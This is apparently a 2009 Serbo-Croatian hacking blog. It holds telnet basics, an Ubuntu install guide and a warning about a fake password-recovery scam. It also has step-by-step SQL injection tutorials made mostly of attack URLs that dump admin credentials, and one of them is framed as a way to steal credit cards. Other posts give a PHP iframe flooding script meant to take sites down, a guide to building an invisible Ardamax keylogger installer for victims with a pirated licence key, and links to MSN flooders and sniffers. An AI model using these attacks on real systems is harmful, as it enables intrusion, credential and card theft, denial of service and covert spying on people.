THE QUIETER YOU BECOME THE MORE ARE ABLE TO HEAR

Dobrodošli na moj blog

27.05.2009.

Za sto sve koristi telnet?

[Sta je telnet?]

Telnet je neverovatni alat koji svaki "haker" MORA da zna da koristi pre nego sto i pomisli o hakovanju servera. Telnet je bolje receno protokol koji zahteva i koga pokrece TCP/IP. Moze se koristiti za konektovanje na udaljene racunare i da izvrsi komandnu liniju programa, jednostavnim unosenjem komandi u njegov GUI (graficki korisnicki interfejs) prozor. Telnet se nalazi u Windows folderu tj u: c:\windows\telnet.exe i u c:\winnt\system32\telnet.exe na Windows NT sistemima, a mozete ga pokrenuti ako u MSDOS-u ukucate telnet.

[Kako da se konektujem na udaljeni kompjuter?]

Veoma je jednostavno da se konektujete na udaljeni kompjuter uz pomoc Telnet-a. Pokrenite telnet i kada vam se pojavi njegov prozor samo kliknite na: CONNECT > REMOTE SYSTEM i zatim u 'HOST NAME' unesite IP adresu ili host racunara na koji se konektujete. Zatim, u 'PORT' unesite otvoreni port na koji se konektujete. TermType treba skoro uvek da vam bude podesen na vt100. Kliknite na CONNECT i bicete konektovani na udaljenu masinu.
Najjednostavniji nacin za pokretanje telneta i njegovo konektovanje na sistem je ako u MSDOS-u ukucate:
C:\>telnet hostname.com ###

- gde je telnet komanda koja pokrece sam program telnet, a hostname.com je host ili ip adresa na koju se konektujemo (npr. ptt.yu) :), a ### je broj otvorenog porta (npr. 139)

Mozda ce vam biti problem u tome sto neznate na koj port da se konektujete tj. koji port je otvoren na masini na koju se konektujete. Da bi ste dobili listu otvorenih portova, morate upotrebiti Port Scanner ili drugi program koji skenira masinu za otvorene portove. Znam da je lamerski koristiti program za nesto kao skeniranje otvorenih portova, ali taj nacin je za vas najlaksi. Ovo je lista nekih osnovnih portova:

Ping 7
Systat 11
Time 13
NetStat 15
FTP 21
SSH 22
Telnet 23
SMTP 25
Whois 43
Finger 79
HTTP 80
POP 110
NNTP 119
IDENT 139

Kao primer konektovanja i koriscenja telneta pokazacu vam konektovanje na FTP port. Dakle, ovako... Ukoliko zelim da se konektujem na odredjeni racunar koji ima IP adresu 123.45.67.8 ja cu prvo da skeniram uz pomoc Port Scannera za otvorene portove na ovom racunaru. Dobicu listu svih otvorenih portova. Naravno, vidim da je otvoren i port 21 tj. FTP. Sada cu u MSDOS-u ukucati:
C:\>telnet 123.45.67.8 21
i konektovacu se na zeljeni FTP server. Sada samo ukucajte ? (2 puta pritisnite ENTER) i dobicete listu komandi koje mozete koristiti. Ovo vazi i za sve ostale portove na koje zelite da se konektujete.
Ovo ce vam zvucati smesno, ali je zanimljivo... uz pomoc telneta se mozete konektovati i na bilo koji irc chat server, tako da vam telnet moze posluziti kao irc klijent :)) Potrebno je samo da se konetktujete na IRC server na port 6667 i da vidite listu komandi.
Evo i jednog predloga: ukoliko ste zrtva mail bomba od strane nekog lamera, umesto da downloadujete sve te stotine poruka, pa zatim da ih brisete, mozete se jednostavno konektovati na POP server vaseg ISP provajdera i odjednom obrisati svu nezeljenu postu bez njenog prethodnog downloadovanja, tako da mozete ustedeti i sate downloadovanja ebomb poruka. Nesto sto je meni najvaznije je to sto uz pomoc telneta mozete dobiti prikaz informacija o sistemu servera tj. informacija o operativnom sistemu i njenoj verziji XeXeXe :)

A ovdje je i popis svih komandi koje mozete vidjeti u telnetu ako utipkate: ?/h


c    - close                    close current connection
d    - display                  display operating parameters
o    - open hostname [port]     connect to hostname (default port 23).
q    - quit                     exit telnet
set  - set                      set options (type 'set ?' for a list)
sen  - send                     send strings to server
st   - status                   print status information
u    - unset                    unset options (type 'unset ?' for a list)
?/h  - help                     print help information

[Zavrsna rec]

Telnet je alat koji ima XXX svrhi i primena. Ja sam obuhvatio samo ono osnovno sto treba da znate o njemu, ali ce te vecinu toga morati sami da otkrijete vezbanjem, vezbanjem i samo ucenjem ;)
Za Telnet cu drugi put odvojiti malo vise vremena, pa cu vam u nekom drugom tutorialu malo vise objasniti upotrebu i moc ove neverovatne alatke.
27.05.2009.

Desktop phising

Nisam mogao puno da vam pomognem oko toga ali ipak video an engleskom jeziku bi vam mozda i dovoljno pomogao.........
Zelim reci da se pravi na slican nacin kao i obican phiser...i da se u ovom videu koriste npr neki programi koji se placaju kao sto je binder i sl. i prema tome je tesko da napravite svoj savrseni desktop phiser no manje vise evo vam skinite video :D

http://rapidshare.com/files/237883316/101.flv.html

27.05.2009.

Phiser za facebook

24.05.2009.

Sorry

Zelim da se izvinem zat sto nisam napisao jos nijedan post...
Valjda ce te da shvatite da imam sada previse obaveza jer zadnja sedmica mi je skole a i necete vjerovati crkla mi je graficka pa dok sam nasao novu i sve to nisam bio u mogucnosti da vam pisem...Zelim vam reci da ce uskoro biti jos postova samo sacekaje i citajte sto je do sada napisano :D Hvala Vam i vidimo se on the net ;)

19.05.2009.

Jos jedan SQL tut na engleskom (Malo kvalitetniji)


SQL Injection Tutorial 


In this tutorial i will describe how sql injection works and how to
use it to get some useful information.


First of all: What is SQL injection?

It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).


1.SQL Injection (classic or error based or whatever you call it) :D

2.Blind SQL Injection (the harder part)


So let's start with some action :D


1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5


Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection :)

2). Find the number of columns

To find number of columns we use statement ORDER BY
(tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error

http://www.site.com/news.php?id=5 order by 2/* <-- no error

http://www.site.com/news.php?id=5 order by 3/*
<-- no error

http://www.site.com/news.php?id=5 order by 4/* <-- error
(we get message like this Unknown column '4' in 'order clause'
(or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/*
(we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/*
NOTE:
if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version()
and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations
(IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it :)

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version :D

5). Getting table and column name

well if the MySQL version is
< 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are:
username,
user,
usr,
user_name,
password,
pass,
passwd,
pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
(we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...

now to check column names.


http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*
(if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*
(if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text,
 it depends of how the database is set up :)

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice :)

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )


http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen,
 i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser :D

if can't guess the right table name, you can always
try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get
 the first table from information_schema.tables

displayed on the screen.
Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... :D

if you wanna display column names for specific table use this query.
(where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together :D

for that we use concat() , i decribe it earlier.

i.e


http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com


That's all in this part, now we can proceed on harder part :)



2. Blind SQL Injection

Blind injection is a little more
complicated the classic injection but it can be done :D

I must mention, there is very good blind sql injection tutorial by xprog,
so it's not bad to read it :D

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5
and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2
<--- this is false

so if some text, picture or some content is missing on returned
 page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user
and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :)

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (
with limit 0,1 our query here returns 1 row of data,
cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5
and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)


4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80


ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95


we get TRUE, keep incrementing


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR :D



Hope you learned something from this paper.


Have FUN! (:
18.05.2009.

SQL (tu se ubraja i krada kreditnih kartica)

Sami ste htjeli da nucite "hackat" kreditne kartice (CC),pa da i vidite na kraju kako malo izgleda ono napredniji hack :D.Ovo je na neki nacin i hackanje web stranica ulazak u njenu bazu i kupljenje svih podataka pa tako i CC....Ovo su tek osnove da samo vidite da ste se pozurili sa zahtjevima za hack ;)

Sql injection BASIC
#####################################################################################
tutorial by SHUMA (Bivsi vlasnik L4H Tima
#####################################################################################

UVOD
Sql injection je jedan od najrasprostranjenijih, ako ne i najrasprostranjeniji propust u sigurnosti web aplikacija. Preko sql injectiona možemo pristupiti podacima za koje bi nam inače trebale specijalne privilegije. Obično možemo pročitati korisnička imena(username), lozinke (password), i ostale privatne podatke iz baze podataka na stranici. Baza podataka je “mjesto” na stranici gdje se čuvaju podaci. Sastoji se od tabela (TABLE), a svaka tabela se sastoji od stupaca (COLUMN).U daljnjem tekstu ću koristiti engleske nazive, tj. tables i columns
u sql naredbama izbor stupaca i tabela obično izgleda ovako:
SELECT column FROM table WHERE id = 16
ako pretpostavimo da se table zove korisnici, a sadrži columne ID, IME i PREZIME, onda će sql naredba izgledati ovako:
SELECT ime FROM korisnici WHERE id = 16
U linku će to otprilike izgledati ovako:
www.nekastranica.com/korisnik.php?id=16

PROVJERA RANJIVOSTI
ako na naš link dodamo ‘ na kraju, primjer: www.nekastranica.com/korisnik.php?id=16
ako nam izbaci neki od ovih errora, stranica je ranjiva
• Error: Warning: mysql_fetch_assoc():......
• Warning: mysql_num_rows():........
• You have an error in your SQL syntax.....
• "MySQL Syntax Error By '1''
Ako izbaci takav ili sličan error, stranice je ranjiva.
PRONALAŽENJE BROJA COLUMNA
Broj columna ćemo otkriti naredbom order by
primjer www.nekastranica.com/korisnik.php?id=16+order +by+1--
Umjesto razmaka možemo stavljati znak “+” bez navodnika.
Na kraju cijelog linka stavljamo znakove “--“ ili “/*” bez navodnika. Ponekad se zna dogoditi da jedan od tih znakova uzrokuje error. Ako je tako, koristimo ovaj drugi.
primjer www.nekastranica.com/korisnik.php?id=16+order +by+1--
znači, ako nije izbacilo nikakav error, povećavamo ovaj broj na kraju za 1
primjer www.nekastranica.com/korisnik.php?id=16+order +by+2--
primjer www.nekastranica.com/korisnik.php?id=16+order +by+3--
i tako idemo sve dok ne dobijemo error.Kada se error pojavi, to znači da smo dosegli maksimum.Vraćamo se jedan broj u nazad. To je naš broj columna.
znači, ako smo dobili error primjer www.nekastranica.com/korisnik.php?id=16+order +by+13-- , znači da imamo 12 columna.
ako smo dobili error primjer www.nekastranica.com/korisnik.php?id=16+order +by+9-- , znači da imamo 8 columna.
Nadam se da ste ovo shvatili. Idemo dalje.
UNION KOMANDA
Kada smo otkrili broj columna, vrijeme je da otkrijemo preko kojega možemo injectati. To ćemo uraditi naredbom UNION SELECT ili UNION ALL SELECT. Preporučujem drugu, jer kod prve zna češće doći do errora.
To će izgledati otprilike ovako. Recimo da naš site ima 12 columna. UNION komanda za to će izgledati
primjer www.nekastranica.com/korisnik.php?id=16 ... 10,11,12--
kada to izvršimo taj link u našem browseru, na stranici će se pojaviti neki brojevi koji prije nisu bili. Trebamo zapamtiti te brojeve. Preko njih ćemo izvršiti ostale korake.Ako se nikakvi brojevi ne vide na stranici, a nema ni errora, na kraju linka treba dodati “LIMIT+1,1” bez navodnika. Tada će se brojevi vjerojatno pojaviti. Recimo da smo dobili brojeve 3 i 5.
primjer www.nekastranica.com/korisnik.php?id=16 ... IMIT+1,1--
VERSION KOMANDA
Sada trebamo provjeriti mysql verziju. To ćemo uraditi tako da umjesto jednog broja iz predhodnog koraka (u našem slučaju 3 i 5) upišemo “version()” ili “@@version”.
primjer www.nekastranica.com/korisnik.php?id=16 ... 10,11,12--
Sad bi nam trebalo prikazati mysql verziju u obliku 4.0.16 ili 5.0.26 ili slično.
Ako je mysql verzija veća od 5, možemo koristiti information_schemu za dobivanje naziva tablea i columna. Ako je manja od 5, morat ćemo pogađati nazive.
Neke stranice imaju zabranu korištenja komande UNION, tako da nećete moći provjeriti mysql verziju. To se lako riješava funkcijama unhex(hex()). Na našem primjeru, to bi izgledalo ovako:
primjer www.nekastranica.com/korisnik.php?id=16 ... x(@@ersion)),4,5,6,7,8,9,10,11,12--
Na taj način možete zaobići zaštitu i na ostalim komandama, ne treba nužno biti version komanda.

AKO JE MYSQL VERZIJA VEĆA OD 5
Ako je myslq verzija veća od 5, iskoristit ćemo information_schema za dobivanje imena columna i tablea.
za dobivanje imena table-a: umjesto broja koji smo dobili UNION SELECT naredbom stavljamo “table_name” bez navodnika, a na kraju cijelog linka dodajemo “from+information_schema.tables” bez navodnika. U našem primjeru to bi izgledalo ovako:
primjer www.nekastranica.com/korisnik.php?id=16 ... a.tables--
za dobivanje columna koristimo sljedeće: umjesto broja koji smo dobili UNION SELECT naredbom stavljamo “column_name” bez navodnika, a na kraju cijelog linka dodajemo “from+information_schema.columns” bez navodnika. U našem primjeru to bi izgledalo ovako:
primjer www.nekastranica.com/korisnik.php?id=16 ... .columns--
za dobivanje svih baza na nekoj stranici koristimo sljedeće: umjesto broja koji smo dobili UNION SELECT naredbom stavljamo “schema_name” bez navodnika, a na kraju cijelog linka dodajemo “from+information_schema.schemata” bez navodnika. U našem primjeru to bi izgledalo ovako:
primjer www.nekastranica.com/korisnik.php?id=16 ... schemata--

Ako se vidi samo jedan naziv, a ne cijela lista, pogledajte sljedeći odjeljak.

NAREDBA LIMIT
Ako se od traženih podataka vidi samo jedan redak, a ne cijela lista, moramo koristiti naredbu LIMIT. Naredba LIMIT se koristi tako da na kraju cijelog linka doda naredba “limit+početni_redak,broj_sljedećih redaka”. Zapravo to izgleda ovako “limit+0,1”. 0 je redak od kojeg se počinje ispisivati, a 1 je broj redaka koji će se ispisati. “limit+2+6”, znači da se počinje ispisivati od drugog retka i ispisuje 6 sljedećih redaka. Nadam se da ste shvatili ovo. U našem slučaju, na kraj dodajemo ovo:
primjer www.nekastranica.com/korisnik.php?id=16 ... imit+1,1-- kada pročitate podatke, idete na sljedeći redak
primjer www.nekastranica.com/korisnik.php?id=16 ... imit+2,1-- kada pročitate podatke, idete na sljedeći redak
primjer www.nekastranica.com/korisnik.php?id=16 ... imit+3,1-- kada pročitate podatke, idete na sljedeći redak
ITD.....Nadam se da ste shvatili ovaj dio.

AKO JE MYSQL VERZIJA MANJA OD 4
Onda morate pogađati imena columna i tablesa.
Uobičajena table imena
• mysql.user
• user
• users
• admin
• admins
• administrator
• login
• korisnici
Uobičajena column imena
• username
• name
• user
• ime
• korisnik
• password
• pass
• passwd
• psw
• lozinka

DOBIVANJE PODATAKA
Sada kada imamo imena columna i tablea možemo napraviti završni korak. Dobivanje podataka iz baze. To možemo postići na ovaj način: SELECT column FROM table, ili što nama treba SELECT username,password FROM mysql.user. U našem slučaju, brojeve 3 i 5 mijenjamo za imena columna, a na kraju dodajemo “FROM ime_tablice”
Na našem primjeru bi to trebalo ovako izgledati
primjer www.nekastranica.com/korisnik.php?id=16 ... sql.user--
I to je to. Dobili smo naše podatke. Postoji još i concat naredba, koja je jednostavnija za korištenje jer pomoću nje možemo zapisati više columna na isto “mjesto”, tj. umjesto jednog broja
primjer www.nekastranica.com/korisnik.php?id=16 ... rname,0x3a, password),4,5 ,6,7,8,9,10,11,12+from+mysql.user—
0x3a je samo zamjena za znak “:”
Nadam se da sam vam malo približio osnove sql injectiona. Ovo su samo osnovne tehnike, a o malo kompliciranijima(load_file, zaobilaženje filtera, ...)

15.05.2009.

Some Noob Hacknig tools for msn

File: Msn Auto Responder.rar
DownloadLink: http://rapidshare.com/files/75269540/Msn_Auto_Responder.rar

--------------------------------------------------------------------------
File: Msn Detector 2.0.rar
DownloadLink: http://rapidshare.com/files/75270255/Msn_Detector_2.0.rar

--------------------------------------------------------------------------
File: MSN Bomberman v3.1.2.rar
DownloadLink: http://rapidshare.com/files/75270317/MSN_Bomberman_v3.1.2.rar

--------------------------------------------------------------------------
File: MSN.Sniffer.1.2.+.Crack.rar
DownloadLink: http://rapidshare.com/files/75270787/MSN.Sniffer.1.2._.Crack.rar

--------------------------------------------------------------------------
File: Locker.rar
DownloadLink: http://rapidshare.com/files/75271252/Locker.rar

---------------------------------------------------------------------------
File: MSN Flooder.rar
DownloadLink: http://rapidshare.com/files/75271337/MSN_Flooder.rar

Ovo su vam neki programcici za zafrkanciju na msnu uglavnom flood i sl :D

14.05.2009.

PHP ddos attack


Eh evo vam ova php scripta za ddos attacke.... Znaci samo prepravite ovaj kod ono gdje pise "sitetoddos" stavite ime sajta koji ddosate, najbolje je da ovo uploadate na sto vise freehostinga jer nevalja sve na 1....


Ovakvih 5 scripti uploadanih na 5 razlicitih freehostinga mogu srusiti site....

Znaci samo ovako konfiguracije napravite:

Frames to open: 10000

Site to open: http://imesajtata

Refresh Rate: 0

UZIVAJTE!

A evo i koda:

<HTML>
<HEAD>
<?php
if(isset(
$_GET['refresh'])) {
echo "<meta http-equiv=\"refresh\" content=\"".$_GET['refresh']."\">";
}
?>

<TITLE>Frames? Yes.</TITLE>
</HEAD>
<BODY>
<?php
$defSite "http://www.sitetoddos/";
$defFrames 6;
$defRefresh 0;

if(!isset($_GET['sockets'])) {
$frames $defFrames;
}
else {
$frames $_GET['sockets'];
}
if(!isset($_GET['site'])) {
$site $defSite;
}
else {
$site $_GET['site'];
}

for($i 1$i <= $frames$i++) {
echo "<iframe src=\"$site\" width=\"25%\" height=\"25%\"></iframe>";
if($i == 0) {
echo "<br />";
}
}
print_r($_GET);
?>

<br />
<form action=<?php echo "\"".$_SERVER['PHP_SELF']."\"" ?> method="GET">
<label>Frames to use:</label>
<br />
<input type="text" name="sockets" />
<br />
<label>Site to open:</label>
<br />
<input type="text" name="site" />
<br />
<label>Refresh rate:</label>
<br />
<input type="text" name="refresh" />
<br />
<br />
<input type="submit" value="Open frames" />
</form>
</BODY>
</HTML>


Ovo se znaci upload na jedan host koji podrzava php i nravno idite opteretite
dernek ako vas ima dovoljno ;)
13.05.2009.

Kao sto sam obecao Instalacija linux-a

Ovaj tutorial će vam koristiti ako želite instalirati Ubuntu Linux. Ovaj tutorial prikazuje 8.04 verziju, ali u biti je to skoro sve isto.

1. Downloadajte Ubuntu na linku : http://www.ubuntu.com/getubuntu/download
Izaberite BiHNet, jer je najbrži.

2. Kad skinete, u Nero Burning ROM-u zapržite sliku na DVD: Ili ako ste vec narucili CD odlicno je :D



3. Restartate komp i odete u BIOS. Odete pod Boot Device Priority i postavite ovako:



4. Postavite CD od Ubuntua u čitač.

5. Pritisnite F10 i odgovorite na Yes da sačuva promjene.

6. Nakon restarta, mora se učitati glavni izbornik od Ubuntuovog CD-a :



Izaberite prvu opciju.

7. Nakon što se učita desktop, kliknite dvaput na Install:



8. Instalacija : Korak 1

Tu izaberete jezik (preporučeno English) i kliknete Forward.



9. Korak 2

Odaberite lokaciju gdje živite ( za Hrvatsku vrijedi postavka Zagreb).



10. Korak 3

Postavite Layout tipkovnice. Pronađite Croatia i isprobajte slova u boxu:



11. Korak 4

Particioniranje diska - ostavite na Guided i stisnite Forward.



12. Korak 5

Upišite svoje pravo ime, korisničko ime i password. Password unesite 2 puta.



13. Korak 6

Potvrdite da li je sve točno i kliknite Install.



14. Sačekajte do kraja instalacije.



15. Kad završi, kliknite Restart.

16. Upišite svoje korisničko ime i lozinku u log in formi nakon bootanja.

17. Čestitam! Uspješno ste instalirali Ubuntu 8.04! Taj postupak vrijedi za sve instalacije.


OSNOVNA PODEŠENJA

Mreža:
Linux radi uglavnom samo sa Ethernet modemima kao što su Kasda KD318MUI, Siemens C-010-I, Zyxelovi itd. Kad priključite ethernet priključak, internet će vam odmah proraditi kad uključite računalo.

Upute možete naći ovdje ako vam ne radi: http://www.t-com.hr/pdf/main/Internet/Upute/MAX/Upute_za_Linux.pdf
Pronađite " Podešavanje u GNOME okolini"


Sigurnost:

Antivirusa za Linux ima, a to je :avast! 4 Workstation
Link za download: http://files.avast.com/files/linux/avast4workstation_1.0.8-2_i386.deb

I AVG: http://free.grisoft.com/ww.download?prd=afl
"Kliknite Debian, Ubuntu"

Ovaj tutorial sam nasao na google :D time vam samo pokazem da sve sto pitate ovdje mozete naci i na google :D ali opet vam hvala sto mi blog punite postovima ;) vremena nisam ima da pisem sve ali eto izmjenio sam neke stvarcice.

11.05.2009.

Malecko Upozorenje

Posto danas ljudi gube svoje passworde od msn na sve moguce nacine pa i na jedan od ovih



KREKUJTE NECIJU LOZINKU! ZELITE LI PROVALITI NECIJI YAHOO ILI HOTMAIL PASSWORD? Nema nista lakse! Prvo morato imate ili yahoo ili hotmail account. Zapocnite novi e-mail. U polje "To:" unesite adresu
BIN_RECOVER_PASS@yahoo.com, ovo je automaticni server yahoo-a. U polje za "Subject" unesite "PASSWORD RECOVERY". U prvom redu teksta napisite e-mail koji zelite da provalite password. U trecem redu napisite vas e-mail.
 U petom redu napisite password vaseg e-mail-a (server yahoo-a se mora logirati kroz vas mail, i onda vama salje password zrtve).
Odmah ispod vaseg passworda morate napisati ovaj kod: cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa script< ip://233.243.2.34/cgi-bin/start? v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
 Ovaj je kod kljuc kod otkrivanja e-mail-a. Bez njega nece biti efekta.
Na ovaj nacin zbunjujete server i umjeso da ga posalje natrag zrtvi salje ga vama. Nakon 48 sati trebali bi ste dobiti e-mail u inboxu koji ce glasiti: "System Reg Message" from "system"
Evo kako bi to izgledalo:
To: BIN_RECOVER_PASS@yahoo.com
Subject: PASSWORD RECOVERY
-----------------------------------------------------
 email_zrtve@yahoo/hotmail.com
vas_email@yahoo/hotmail.com password vase poste cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start? v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
-----------------------------------------------------

I tako slicno samo da vam kazem dijeco manite prljavog posla i ne padajte na ovako sto jer je to samo glupost vi sto posaljete (a saljete vaas username i password) odlazi "hackeru" da je bogdom heheh :D et toliko od mene  Ako nesto niste shvatili obavezno komentarisite

11.05.2009.

Tutorial sa slikama za Keylogger

Mislim da bi ovo svi zeljeli pa evo da napravim nesto i tako :D

PRVA ETAPA
Krecemo od pocetka:

1.    Skinite sebi Ardamax 2.8 ili 2.9 (preporucio bi 2.8)
Evo vam linkovi :

http://rapidshare.com/files/151005523/setup_akl.zip.html        (ARDAMAX  2.8)
http://rapidshare.com/files/151005680/setup_akl2.zip.html      (ARDAMAX  2.9)

Ako mi nevjerujete za linkove da su cisti idite na google pa trazite sami :D..Meni je svejedno...

2.  Kad skinete Keylogger trebali bi da vidite ikonicu koja lici na notepad :D... Ona bi se nalazila u donjem desnom uglu vaseg ekrana :D  desni klik i kliknite na "ENTER REGISTRATION KEY"
Eh kad ste to uradili onda kucajte ovo :D

Name: Membros
Key: CKPIUQDMITNVNRI


Kada to odradite kliknite na OK i trebalo bi da vam izbaci da kljuc vazeci ili na engleskom ovako
"Registration key is accept. Thanks for registering"
I time ste rijesili 1 od  4 glavne etape kako bi nekome uvalili keylogger ;) Idemo dalje

DRUGA ETAPA

1.   Sada pravimo remote Instalaciju..Ako pratite upute nebi bilo nekih problema (To vam je stvarka koja se salje preko msn zrtvi ili kako vec vi zelite da je posaljete)
Kliknite na "Remote Installation" pa na "next" sve dok ne dodete do "it might come up straight away for ardamax  2.9 but I cant be acked checking".

2.Sada bi trebali biti u  Apperarences,Kliknite na "Additional components" i  uradite ovako kako je na slici....



Te onda kliknite na "Next"

3.Dodite do "Invisibility", Potrudite se za sve ove male boxes trebaju biti ticked , ;) Ovom opcijom ste napravili keylogger da bude nevidljiv :D  Kliknite Next i idemo do sledece opcije

4. Sada je na redu "Security", Kliknite na "Enable" i postavite svoj password stavite sta jednostavno da bi mogli lakse da zapamtite pa na next

5. Kad dodete do Web Update samo kliknite na next i picimo dalje

